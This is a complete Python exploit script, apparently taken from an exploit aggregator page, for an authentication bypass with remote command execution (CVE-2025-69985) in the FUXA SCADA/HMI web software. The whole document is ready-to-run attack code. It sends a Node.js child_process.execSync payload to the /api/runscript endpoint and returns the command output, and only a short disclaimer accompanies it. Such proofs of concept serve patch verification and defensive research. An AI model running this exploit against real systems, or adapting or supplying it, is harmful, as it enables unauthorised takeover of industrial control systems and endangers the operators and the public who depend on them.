Share
## https://sploitus.com/exploit?id=PACKETSTORM:216189
#!/usr/bin/env python3
    """
    FUXA โ‰ค 1.2.8 Authentication Bypass + RCE Exploit
    CVE-2025-69985
    
    This Python exploit targets CVE-2025-69985, an authentication bypass in FUXA
    (web-based SCADA/HMI software) that allows access to the protected /api/runscript
    endpoint even when authentication is enabled.
    
    By sending a crafted JavaScript payload using child_process.execSync, it achieves
    full remote command execution with complete stdout capture (no reverse shell needed).
    
    Author: Joshua van der poll (https://github.com/joshuavanderpoll/CVE-2025-69985)
    Created: February 2026
    Version: 1.0
    License: GNU General Public License v3.0 (GPL-3.0)
    Disclaimer: Use responsibly. This is a proof-of-concept for a patched
                     vulnerability (fixed in FUXA > 1.2.8). Do not use against
                     systems you do not own or have explicit permission to test.
    
    Usage:
        python3 exploit.py -u http://target:1881 -c "whoami"
    """
    
    import requests
    import argparse
    import sys
    import urllib3
    
    # Disable SSL warnings
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    
    # Colors
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'
    BLUE = '\033[94m'
    CYAN = '\033[96m'
    RESET = '\033[0m'
    
    def print_status(msg, color=BLUE, symbol="[*]"):
        print(f"{color}{symbol} {msg}{RESET}")
    
    def print_success(msg):
        print_status(msg, GREEN, "[+]")
    
    def print_warning(msg):
        print_status(msg, YELLOW, "[!]")
    
    def print_error(msg, exc=None):
        print_status(msg, RED, "[-]")
        if exc:
            print(f" โ†’ {type(exc).__name__}: {exc}")
            import traceback
            traceback.print_exc(limit=2)
    
    def build_js_payload(command: str) -> str:
        """Build safe Node.js payload with proper escaping"""
        escaped = (command
                   .replace('\\', '\\\\')
                   .replace('"', '\\"')
                   .replace('`', '\\`')
                   .replace('\n', '\\n'))
        
        js = f"""const cp = require("child_process");
    try {{
        const result = cp.execSync("{escaped}", {{ encoding: "utf8" }});
        return result.toString();
    }} catch (err) {{
        return "ERROR: " + err.message +
               (err.stdout ? "\\nSTDOUT: " + err.stdout.toString() : "") +
               (err.stderr ? "\\nSTDERR: " + err.stderr.toString() : "");
    }}"""
        return js
    
    def run_command(session, base_url, command):
        print_status(f"Preparing payload โ†’ executing: {command}")
       
        js_code = build_js_payload(command)
        payload = {
            "params": {
                "script": {
                    "parameters": [],
                    "mode": "",
                    "id": "exploit",
                    "name": "exploit",
                    "code": js_code,
                    "test": js_code
                },
                "toLogEvent": False
            }
        }
    
        headers = {
            "Content-Type": "application/json",
            "Referer": f"{base_url}/fuxa"
        }
    
        print_status("Sending exploit request to /api/runscript ...")
        try:
            resp = session.post(
                f"{base_url}/api/runscript",
                json=payload,
                headers=headers,
                timeout=15,
                verify=False
            )
    
            print_status(f"Response status: {resp.status_code}", CYAN)
    
            if resp.status_code == 200:
                output = resp.text.strip()
                print_success("Command executed successfully (CVE-2025-69985 bypass)!")
                print(f"\n{GREEN}=== COMMAND OUTPUT ==={RESET}")
                print(output if output else "(no output)")
                print(f"{GREEN}======================{RESET}\n")
                return True
            else:
                print_error(f"Server returned {resp.status_code}")
                if resp.text.strip():
                    print(f"Body preview: {resp.text[:500]}")
                return False
    
        except requests.exceptions.Timeout:
            print_warning("Request timed out (command may still have executed)")
            return False
        except Exception as e:
            print_error("Request failed", e)
            return False
    
    def exploit_command(base_url, command):
        session = requests.Session()
        session.verify = False
    
        # Execute command
        success = run_command(session, base_url, command)
    
        if success:
            print("\n" + "="*70)
            print(f" {GREEN}Exploit completed!.{RESET}")
            print("="*70 + "\n")
        else:
            print_warning("Exploit may require checking target version / network")
    
    def main():
        parser = argparse.ArgumentParser(
            description="FUXA โ‰ค 1.2.8 Auth Bypass + RCE (CVE-2025-69985)"
        )
        parser.add_argument('-u', '--url', required=True, help="Target URL (http(s)://host:port)")
        parser.add_argument('-c', '--cmd', required=True, help="Command to execute on target")
        args = parser.parse_args()
    
        base_url = args.url.rstrip('/')
    
        print(f"\n {BLUE}Target :{RESET} {base_url}")
        print(f" {BLUE}Command:{RESET} {args.cmd}\n")
    
        try:
            exploit_command(
                base_url=base_url,
                command=args.cmd
            )
        except KeyboardInterrupt:
            print_warning("Interrupted by user")
            sys.exit(2)
        except Exception as e:
            print_error("Unexpected fatal error", e)
            sys.exit(3)
    
    if __name__ == "__main__":
        main()